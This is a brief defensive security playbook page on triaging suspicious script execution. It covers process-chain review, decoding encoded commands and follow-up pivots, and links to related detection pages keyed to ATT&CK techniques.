Playbooks
Script Execution Triage
Separate admin automation from suspicious PowerShell, encoded commands, LOLBins, and endpoint follow-up pivots.
View on Graph
Process Context
Review the parent and child process chain before judging the script. Office, browser, archive tools, or unsigned binaries as parents deserve extra attention.
Command Review
Decode encoded content, expand shortened URLs, and look for download cradle behavior, defense evasion, or credential collection.
Follow-Up
Pivot to file writes, network connections, persistence locations, and other alerts on the same user or endpoint.
Related
- Living-off-the-Land Binaries — how living-off-the-land binaries attacks work and how to detect them
- Process Injection — detection and response for T1055 techniques
- Sysmon — detection and response for T1654 techniques
- EDR Basics — detection and response for T1059, T1003, T1055, T1204, T1562 techniques
- Windows Event Logging — detection and response for T1562 techniques